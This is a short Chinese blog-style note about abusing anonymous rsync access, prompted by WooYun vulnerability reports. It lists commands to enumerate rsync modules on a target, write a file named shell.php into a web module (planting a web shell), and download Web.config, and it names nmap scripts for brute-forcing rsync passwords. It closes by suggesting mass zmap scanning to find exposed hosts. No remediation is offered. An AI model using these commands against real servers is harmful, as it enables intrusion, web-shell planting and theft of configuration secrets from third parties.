rsync 匿名访问
最近看 wooyun hot bugs,关注到这个问题,感觉引起的危害还是比较大的,而且很多管理员也没有注意到。
基本语句:
rsync X.X.X.X:: //列模块
rsync /tmp/shell.php X.X.X.X::web/ //写文件
rsync -avz X.X.X.X::web/Web.config /tmp/Web.config //下载文件
有用的脚本:
- /usr/local/share/nmap/scripts/rsync-brute.nse //暴力破解密码
- /usr/local/share/nmap/scripts/rsync-list-modules.nse //列模块
实例就不来了,zmap 扫描下端口,很多的。